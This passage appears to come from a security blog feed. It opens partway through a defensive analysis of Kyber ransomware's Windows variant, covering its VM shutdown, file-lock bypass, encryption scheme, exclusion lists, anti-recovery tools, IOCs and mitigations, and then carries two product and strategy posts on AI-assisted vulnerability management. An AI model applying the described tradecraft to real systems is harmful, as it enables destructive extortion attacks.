Figure 8: PowerShell commands used for Hyper-V termination.

Each VM is terminated with a "hard stop" (-TurnOff) which forces an abrupt shutdown, releasing file locks so the malware can encrypt. As noted in the CLI help text, the developer currently considers this Hyper-V functionality "experimental."

File encryption workflow

For each file, the binary checks for a prior encryption marker to avoid redundant processing. If the file is locked, the malware uses the Windows Restart Manager to identify and terminate the responsible process. If access is still denied, it modifies the file’s permissions (ACL) to Everyone:FullControl and clears the read-only attribute. It retries this entire sequence up to three times per file to ensure it can successfully open and encrypt the data.

Once encryption succeeds, the file is renamed with the .#~~~ extension, and a READ_ME_NOW.txt ransom note is dropped in the directory. Each successful operation is logged to the console as Successfully encrypted <file>. File size: <size>. To maintain system stability and to keep the OS bootable, the malware excludes critical system directories and files from encryption listed below:

$recycle.bin,perflog,system volume information,thumb,programdata,appdata,microsoft,netframework,c$, all users

Figure 9: Skipped directories

READ_ME_NOW.txt,lockerlog_*,processed_file.icon,ntuser.dat,ntuser.dat.log,ntuser.ini,desktop.ini,autorun.inf,ntldr,bootsect.bak,thumbs.db,boot.ini,iconcache.db,bootfont.bin

Figure 10: Skipped files

Cryptography

Unlike the Linux variant, this sample actually uses what it claims: Kyber1024 and AES-256-CTR.

The sample uses a hybrid encryption design. The embedded public key is validated against the expected Kyber1024 public key size of 1568 (0x620) bytes.

Public-key-size-check-with-branch-to-error-on-mismatch.png
Figure 11: Public key size check (1,568 bytes / 0x620) with branch to error on mismatch

Following validation, the sample initializes an AES-256 CTR context using a 32-byte key, which it expands into a 60-word key schedule.

This confirms that Kyber is not used for direct file encryption. Instead, Kyber1024 protects the symmetric key material, while AES-CTR handles bulk data encryption. 

Registry artifacts and icon registration

When executed with elevated privileges, the malware assigns a custom icon to encrypted files by registering the .#~~~ extension. It creates C:\fucked_icon\ directory, writes processed_file.icon to that location, and configures it in the registry as the default icon.

Regedit-output-kyber.png
Figure 12: Regedit output after execution of Kyber with elevated privileges

The malware executes ie4uinit.exe to refresh the shell icon cache. This forces Windows to display the new icons immediately across the filesystem without a system restart.

Mutex

The choice of the mutex is interesting. The mutex name boomplay[.]com/songs/182988982 is stored as a wide string in .rdata and appears to be a link to a song on Boomplay, which is a legitimate African music streaming platform. We were unable to identify the specific track due to geo-restrictions we could not bypass.

Mitigation guidance

Based on the observed Tactics, Techniques, and Procedures (TTPs), organizations should focus on the following defensive actions:

Harden virtualization infrastructure (T1021.004)

Kyber’s reliance on SSH for ESXi host access and native tooling like esxcli highlights critical control points.

  • Implement least-privilege access for ESXi shell and SSH, ideally disabling them entirely unless required for maintenance.

  • Enforce multi-factor authentication (MFA) on all management interfaces and accounts.

  • Monitor esxcli execution for VM termination (vm process kill) or configuration changes, which are late-stage indicators of compromise.

Prevent anti-recovery (T1485, T1070.001, T1562.001)

Kyber uses 11 distinct commands to impair defenses, including VSS deletion and log clearing.

  • Restrict execution: Prevent unprivileged users from executing command-line utilities like vssadmin.exe, wmic.exe, and wevtutil.exe.

  • Protect backups: Ensure backups (especially Veeam/SQL targets) are immutable and stored off-host or in segregated network segments that the Windows variant cannot reach, even with elevated privileges. The ransomware explicitly targets these services and file systems.

Detection focus (lateral movement & defacement):

  • Monitor for defacement artifacts: Actively monitor for changes to VMware's management files (/etc/motd, /usr/lib/vmware/hostd/docroot/index.html, etc.) in ESXi environments.

  • Custom entropy check: The Windows variant’s custom entropy pipeline suggests an effort to ensure key quality. Analysts should incorporate the provided IOCs (mutex: boomplay[.]com/songs/182988982) and file extensions into their detection rules.

MITRE ATT&CK techniques

ID

Technique

Use 

T1486

Data Encrypted for Impact

Primary objective for both variants.

T1485

Data Destruction

Deletion of shadow copies and backups via vssadmin and wmic.

T1489

Service Stop

Terminating ESXi processes and Windows database services.

T1070.001

Indicator Removal: Clear Windows Event Logs

Using wevtutil to clear logs after infection.

T1021.004

Remote Services: SSH

Primary vector for interacting with ESXi hosts.

T1562.001

Impair Defenses: Disable or Modify Tools

Disabling Windows Recovery Environment and boot failure prompts.

Indicators of compromise (IOCs)

Type

Indicator

Description

SHA-256

6ccacb7567b6c0bd2ca8e68ff59d5ef21e8f47fc1af70d4d88a421f1fc5280fc

Linux/ESXi ELF Binary

SHA-256

45bff0df2c408b3f589aed984cc331b617021ecbea57171dac719b5f545f5e8d

Windows Rust Binary

SHA-256

4ed176edb75ae2114cda8cfb3f83ac2ecdc4476fa1ef30ad8c81a54c0a223a29

Old Windows Variant

Extension

.xhsyw

Encrypted file extension (Linux)

Extension

.#~~~

Encrypted file extension (Windows)

Filename

readme.txt / READ_ME_NOW.txt

Ransom notes

Mutex

boomplay.com/songs/182988982

Mutex used by the Windows variant

Conclusion

Kyber ransomware isn’t a masterpiece of complex code, but it is highly effective at causing destruction. It reflects a shift toward specialization over sophistication. The operators didn’t need custom exploits or zero-days, because they didn’t have to use them. Instead, they simply used the standard ransomware playbook of abusing native tools like esxcli and vssadmin, and it was enough.

The encryption claims in the ransom note aren’t the main story. If anything, they highlight a gap between the campaign's marketing and its execution. The sophistication of the defense must now be measured against the attacker's specialization, not their code complexity. Ignoring Kyber's multi-platform nature is an acceptance of a total operational blackout.

From Bulk Export to AI-ready Security Workflows: Introducing Rapid7’s Open-Source MCP Server and Agent Skill

21 April 2026 at 09:58

Security teams want more from their data than APIs and one-off reports.

They want to ask better questions, move faster, and bring security context into the workflows they are already building. That’s especially true as more organizations experiment with private AI assistants, internal copilots, and LLM-powered automation. Part of this experimentation is, of course, attempting to lower the pressure on teams that have to figure out how to prioritize the sheer number of actionable vulnerabilities efforts like Project Glasswing are quickly becoming hyper-skilled at spotting.     

That’s why Rapid7 is introducing a free, open-source MCP Server and Agent Skill for Bulk Export. Bulk export is a highly efficient way to access all your Rapid7 data; no more paging APIs, no more verbose output. Bulk Export creates a local offline replica of your data the LLM can efficiently and quickly interrogate, reducing token cost and time to answer questions.

This new MCP and Agent Skill gives customers a standardized way to connect Rapid7 vulnerability and exposure data to AI assistants and custom AI workflows. Built as an open-source bridge, it helps customers bring their Rapid7 data into the tools and experiences that work best for their teams.

image3.png

Why this matters now

Security teams are no longer just buying tools. They’re connecting systems, shaping workflows, and testing how AI can help analysts, IT teams, and leaders get to answers faster. For many teams, the path from raw security data to usable AI context is still manual. It often means exporting data, building wrappers, shaping queries, and managing custom integrations.

Rather than leave every team to solve that challenge from scratch, we wanted to provide a stronger foundation that is flexible, practical, and easy to extend over time. With projects like Metasploit and Velociraptor, Rapid7 is committed to Open Source, and by sharing with the broader community we hope to accelerate velocity and ensure we’re able to incorporate more use cases and fixes. These processes also give customers full visibility of the code running and tools used, ensuring data privacy and allowing the user to do with their data what they please.  

What MCP does

Model Context Protocol, or MCP, is an emerging standard for helping AI systems interact with external data and tools in a structured way.

In practical terms, it gives AI assistants a cleaner way to ask questions, retrieve data, and work with systems beyond the model itself. For customers, that means less custom glue code and a more consistent way to use security telemetry in AI-driven workflows.

That matters because many security reporting and analysis workflows still assume a high technical bar. Answering a simple question can require custom queries, SQL knowledge, or dashboard work. But the people who need those answers aren’t always security specialists. They may be IT partners, compliance stakeholders, or executives who want clarity but might not need to understand the underlying query logic.

The MCP server helps lower that barrier: Instead of starting with raw exports and working backward, teams can start with the question they need answered.

The bigger picture: MCP and CTEM

This approach also aligns with the broader shift toward continuous threat exposure management, or CTEM. 

CTEM is about helping teams move beyond point-in-time findings toward a more continuous, contextual understanding of risk. That requires security data that can be accessed, connected, and used across the workflows teams rely on. 

Bulk Export helps make that possible by giving customers more flexibility in how they use Rapid7 data. The open-source MCP server makes it easier to bring that data into AI-assisted and custom workflows.

image1.png

That can support more continuous exposure management workflows by making it easier for teams to triage vulnerability and exposure data. For example, an analyst facing a large queue of new vulnerabilities could use LLM assistance to quickly narrow in on the findings most likely to need attention first. Instead of manually working through exports and queries, they could ask natural-language questions to surface the exposures tied to critical assets, unresolved remediation work, or other signals available in the data.

From data portability to AI-ready interoperability

Bulk Export was already an important step toward giving customers more control over their data. It made it easier to extract and use security telemetry in external tools and analytics environments.

The open-source MCP server builds on that foundation: Instead of using exported data only for dashboards or custom reporting, customers can now use that same data in AI-native experiences. That includes internal assistants, private copilots, workflow automation, and natural-language exploration of vulnerability and exposure data. This makes existing security data easier to use in the environments customers are already investing in.

How it works

At a high level, the architecture is straightforward. Using the Agent Skill, your LLM runs the MCP server locally and automatically prepares the environment by performing the bulk export and loading the data into a local file store. The Agent Skill provides the schemas and knowledge, with the MCP providing the tools to access this data. The LLM then will answer any question by querying, summarizing, and synthesising data locally – an extremely fast and simple process that's for the LLM. 

Depending on the data a customer exports, answers can include vulnerability records, asset data, remediated vulnerabilities, and policy-related results.

The point here isn't just that a model can access the data, it’s that an open-source layer helps customers inspect, adapt, and extend over time, empowering teams to control how that connection works in their own environment. 

What customers can do with it

This opens the door to practical use cases, including:

  • Using LLM assistance to triage vulnerability data faster 

  • Asking natural-language questions to spot exposure and remediation trends

  • Investigating which assets are tied to the most urgent vulnerabilities

  • Understanding what changed over time without manual analysis

  • Exploring policy failures without building manual queries

  • Feeding Rapid7 telemetry into private AI assistants and internal workflows

  • Making reporting more accessible for non-technical stakeholders

image2.png

For teams already trying to operationalize AI, this creates a lower-friction path. Instead of building every integration from the ground up, they can start with a reusable bridge and focus on the workflows they want to enable.

A better path from data to action

Security data only creates value when teams can use it. For many organizations, turning raw telemetry into timely answers is still harder than it should be. Analysts need speed. Leaders need clarity. Builders need flexibility. And more customers want security data that works inside the tools and workflows they already rely on.

The open-source MCP server for Bulk Export is designed to help make that possible.

Bulk Export helps customers take control of their data. This is the next step: helping them put that data to work in AI-ready security workflows.

Ready to explore it for yourself? Visit the Rapid7 Bulk Export MCP Server project on GitHub to learn more and get started.

Project Glasswing and the Next Challenge for Defenders: Turning Faster Discovery into Faster Action

20 April 2026 at 12:20

Anthropic’s Project Glasswing has sparked plenty of discussion about what AI might soon do for vulnerability discovery, but the more useful question for most security teams is how to prepare for, and more importantly seize the opportunity of, what comes next.

 As we wrote in our earlier blog, What Project Glasswing Means for Security Leaders, AI is becoming more capable of finding software flaws. The pressure that follows lands on the teams responsible for deciding what matters, validating risk, assigning ownership, and getting remediation moving across environments that were already hard to manage. We believe that the organizations that will benefit most from the next wave of AI will be the ones that understand their environment well enough to use these emerging AI models with intent, rather than layering them onto immature processes and hoping that speed alone will solve the backlog.

What this moment means for security teams

The number of publicly tracked software vulnerabilities has broken records almost every year over the last decade, while supply chain risk has continued to rise. Most teams were already feeling the strain of more findings than they could process cleanly. The Common Vulnerabilities and Exposures (CVE) program, the standard system for identifying and tracking known vulnerabilities, recorded 48,185 disclosures in 2025, a 20% increase over 2024, with roughly 40% of those disclosed vulnerabilities rated high or critical. 

The pace in 2026 was already working out to hundreds of new CVEs per day when those figures were cited. That tells you something important about the current environment: the challenge has not necessarily been  a lack of findings, but instead converting a growing stream of findings into measurable risk reduction.

The reality is that very few organizations are going to hand a model free rein over their most sensitive environments the minute those capabilities become more widely available. Trust will be built in stages: early adoption is much more likely to focus on backlog reduction, triage support, patch testing, and repetitive lower-tier remediation work that consumes time without carrying the same level of operational risk as the most critical systems in the business. That is a more realistic starting point, and it leads to a more useful question. Before teams apply AI more broadly, they need to understand their environment well enough to use it intentionally.

Establish the foundation before layering in AI

The promise from Project Glasswing and almost every other AI-powered security initiative is quite similar: leverage AI to identify patterns, summarize risk, suggest fixes, and speed up repetitive work. Regardless of technology, success  still depends on how well an organization understands its environment, the context around each finding, and the process used to act on it. 

A model can generate more output than a team ever could on its own, but that output becomes noise if the organization cannot answer basic questions about scope, ownership, criticality, and exposure. Teams need a clear, continuously updated picture of the environment before they can decide where AI should be applied, what should remain human-led, and which parts of the backlog are safe to push through more automated workflows.

The AI landscape is already shifting fast, and it will keep shifting, which is why this moment should prompt a more preemptive and resilient strategy rather than another round of tooling hype. Chasing each new capability as it arrives will inevitably force teams to keep reorganizing around the latest announcement. A stronger path is to get the foundation right first - understand the environment, the attack paths, and the assets that matter most; but most importantly, establishing the process and the people behind making these decisions. Then use AI where it meaningfully improves speed, consistency, and focus.

Why Attack Surface Management should be part of that foundation

A strong foundation starts with visibility. Security teams need a live picture of what exists in the environment, what is exposed, how assets connect to one another, and which systems carry the greatest business impact if something goes wrong. That is where Attack Surface Management becomes central. Rapid7’s approach through Surface Command is built around a continuous view of the attack surface across the digital estate, which helps teams understand where exposures sit and how they relate to internet-facing, business-critical, or otherwise high-impact systems.

That matters for AI adoption just as much as it matters for day-to-day security operations. Teams cannot apply AI strategically if they are guessing about which parts of the environment are lower priority, which assets belong to which owners, or where a newly disclosed flaw could create real business risk. A better view of the attack surface gives organizations the context they need to segment the problem properly. That makes it far easier to start with the right use cases, whether that is backlog reduction in lower-impact systems, targeted prioritization of exposed assets, or faster triage where the risk picture is already well understood.

Ownership is part of that foundation too. Remediation slows down when no one can quickly identify who owns the affected application, environment, or workflow. Security teams already lose time there today, and AI will only make that bottleneck more visible if it starts surfacing issues faster than organizations can assign them. Attack Surface Management helps turn that ambiguity into something more actionable by tying exposure to environment context and likely ownership.

How Vulnerability and Exposure Management turns visibility into action

Once the environment is understood, teams still need a way to move from findings to outcomes. That is where Vulnerability and Exposure Management becomes the operating layer that keeps the work grounded.

The biggest value here is not simply collecting more vulnerability data. It is targeted prioritization and validation. When a disclosure lands, teams need to know whether the issue affects an exposed asset, whether there is evidence of exploitation or attacker interest, whether the impacted system is business-critical, and whether existing controls already reduce some of the risk. That is the kind of context that helps organizations decide what deserves immediate attention and what can be handled through a normal remediation cycle.

This is where artificial intelligence can help move remediation forward faster. Instead of asking teams to manually connect exploit signals, asset criticality, and vulnerability intelligence on their own, AI can distill that context directly in the remediation workflow. That makes it easier to understand why an issue matters, what the likely impact is, and what to do next, which shortens the gap between discovery and a confident decision on how to respond.

We expect most organizations to use AI to assist with, or in some cases take over, lower-tier triage, backlog cleanup, summary generation, and patch support in areas where the workflow is already established and the blast radius is more manageable. Human experts still stay closest to the most critical business logic, the most sensitive environments, and the most complex remediation paths. That is a practical adoption model, and it only works when the organization already has enough structure in place to know where those boundaries are.

Curated vulnerability intelligence changes the quality of decisions

That kind of deliberate adoption only works when teams can make better decisions, faster. Security teams need more than severity scores and a long list of CVEs. They need enough context to understand what matters, what can wait, and where action will reduce real risk fastest. As Rapid7 outlined in The Power of Curated Vulnerability Intelligence, the goal is to identify the vulnerabilities that actually matter and give teams enough context to act with confidence.

That intelligence provides a form of validation that most teams need badly as disclosure volume rises. It helps answer whether a finding is tied to active attacker interest, whether proof-of-concept activity is public, whether the asset is exposed, and whether delaying a patch creates unacceptable risk. It also supports the decisions that happen in the gap between discovery and full remediation. When a patch is delayed because of change controls, testing constraints, or lack of a vendor fix, teams still need to reduce exposure. Curated intelligence helps them decide whether to use segmentation, access restrictions, configuration changes, added monitoring, or virtual patching while the longer-term fix is being worked through.

That is one of the clearest ways Rapid7 helps customers move from data to outcomes. Intelligence is fused into the workflow so teams can prioritize with more precision and validate their actions against real threat context, not just generalized scores.

How runtime and remediation fit into the broader AI story

There is another part of this story that matters as organizations think more seriously about AI-driven security operations. As AI shapes the way teams handle exposures earlier in the lifecycle, context of application at runtime matters more too.

To make that foundation complete, organizations need to look beyond static posture and bring runtime validation into the picture. When teams can identify which vulnerabilities and misconfigurations are actively exploitable in production, and map sensitive data and identity access to real-world attack paths, they get a much clearer view of actual risk. Security teams need to understand what is vulnerable, how systems behave when live, and where unusual activity may suggest a problem is moving toward exploitation. With that runtime context in place, teams can spend less time chasing theoretical vulnerabilities and more time focusing on the exposures that are actively creating risk in live environments. 

That connection between exposure, intelligence, remediation, and runtime behavior is where AI starts to become genuinely useful rather than simply impressive. It supports a more intentional model of security decision-making, one that narrows the gap between what is found, what matters, and what happens next.

What security leaders should do now

This is a good time for security leaders to step back and ask a more disciplined set of questions.

  • Do we understand our environment well enough to direct AI toward the right problems? 

  • Can we clearly separate higher-risk, higher-impact assets from the parts of the backlog that are mostly operational drag? 

  • Is threat intelligence embedded in how we interpret findings, or are we still depending too heavily on raw severity? 

  • Can we identify ownership fast enough for AI-assisted triage to result in meaningful action? 

  • Are compensating controls part of the plan when remediation cannot happen immediately?

Those questions shape the quality of everything that follows.

Glasswing creates a real opportunity for security teams that are ready to use AI with more intention. AI can move work forward faster, reduce manual drag, and absorb classes of issues that currently consume time without improving outcomes. The teams that benefit most will not be the ones that rush to apply new models everywhere. They will be the ones that understand their environment, have a clear view of their attack surface, have mature enough workflows to apply AI where it makes sense, and can measure whether the actions taken actually reduced exposure.

Rapid7’s approach to building resilience is grounded in those same needs. Attack Surface Management provides the environmental foundation, Vulnerability Management drives prioritization and action, curated vulnerability intelligence strengthens validation and decision-making, AI-generated remediation insights compress the time from discovery to the next step, and runtime security adds context where live behavior matters. Together, those pieces help customers build a security program that is ready for AI rather than constantly reacting to it.

❌
❌